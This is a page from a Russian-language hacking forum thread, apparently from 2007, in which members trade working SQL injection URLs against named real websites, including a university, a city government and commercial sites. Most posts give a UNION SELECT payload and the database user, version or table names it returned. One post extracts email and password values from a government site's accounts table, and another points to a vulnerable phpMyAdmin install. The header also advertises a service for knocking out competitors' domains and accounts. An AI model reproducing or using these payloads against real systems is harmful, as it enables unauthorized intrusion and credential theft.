Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 278 из 1242

278

Опции темы

Поиск в этой теме

Опции просмотра

#2771

25.07.2007, 13:45

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

как всегда((( рут на локалхосте ((

Цитата:

http://jcomm.uoregon.edu/facstaff/Profile.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,user(),database(),version(),14,15,16,17,18,19,20, 21,22,23+from+mysql.user/*

ran@jcomm.uoregon.edu
jcomm
4.1.22-log

#2772

25.07.2007, 16:47

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Отправить сообщение для groundhog с помощью ICQ

Код:

http://www.vipcamera.net/?go=catalog&cid=17&gid=-1'+UNION+SELECT+USER(),DATABASE(),VERSION()/*

#2773

25.07.2007, 19:00

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

Провел на форуме:
12985021

Репутация: 676

www.gaithersburgmd.GOV

Код:

http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=@@version--
http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(select%20system_user)

Код:

http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(SELECT TOP 1 EMAIL FROM ACCOUNTS)--
http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(SELECT TOP 1 PASSWORD FROM ACCOUNTS)--

далее =>
http://www.gaithersburgmd.gov/apps/myGaithersburg
&
http://alert.gaithersburgmd.gov

#2774

25.07.2007, 21:21

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

http://provodka.ru/news.php?part=4&id=-669+union+select+1/*

#2775

25.07.2007, 21:49

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Отправить сообщение для NOmeR1 с помощью ICQ

Цитата:

http://www.itmedia.pl/newsy.php?nid=-10+union+select+1,2,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),4,5,6,7
http://www.itmedia.pl/newsy.php?nid=-10+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+limit+21,1

5.0.33-log
itmedia3
itmedia3@localhost

Цитата:

http://www.gentedeminnesota.com/editorial_det.php?nid=-10+union+select+concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),2,3,4,5,6,7,8

4.1.20
gented_db
hdn_bo_user@neveri.venred.com

Цитата:

http://odim.com.ua/news.php?nid=-10+union+select+1,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),3

4.1.21-standard-log
odimcom_dbodimhost1
odimcom_dbuodimh@localhost

Последний раз редактировалось NOmeR1; 25.07.2007 в 21:56..

#2776

26.07.2007, 01:05

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

www.mockva.ru - Недвижимость =\

Код:

http://www.mockva.ru/search.php?sr_id=-1+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

www.mwd.hartford.edu

Код:

http://www.mwd.hartford.edu/news.php?id=-12+union+select+1,2,concat(user(),char(58),version()),4/*

Последний раз редактировалось [53x]Shadow; 26.07.2007 в 02:04..

#2777

26.07.2007, 09:49

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Цитата:

http://rus-opt.ru/cgi-bin/exroot_main.pl?id=-1)+UNION+SELECT+1,2,3,concat(USER(),'<br>',DATABAS E(),'<br>',VERSION())/*

Кроме этого, на серве в http://rus-opt.ru/phpmyadmin/ стоит дырявый предырявый phpMyAdmin 2.6.4-pl1, подвержен уязвимости удалённого или локального инклудинга.

#2778

26.07.2007, 12:21

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

http://www.fullthreadahead.com/classes/index.php?id=-100+union+select+1,2,table_name,4,5,6,7,8+from+inf ormation_schema.tables+limit+25,1/*

#2779

26.07.2007, 14:33

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

gougle.ru

Код:

http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7/*

Путег нашли:

Код:

/home/gougle/public_html/hotcd.php

А прав нету =)

Код:

http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7+from+mysql.user/*

#2780

26.07.2007, 21:33

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

Код:

http://www.socket.net/customer/newsletterview.php?id=-74+union+select+1,2,3,4,VERSION(),6/*

Код:

http://www.best-credit-card.biz/card-offer.php?id=-1214+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,VERSION(),62,63,64,65,66,67,68,69,70,71,72,73,74/*

Последний раз редактировалось SWAT; 26.07.2007 в 22:08..

Страница 278 из 1242

278

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход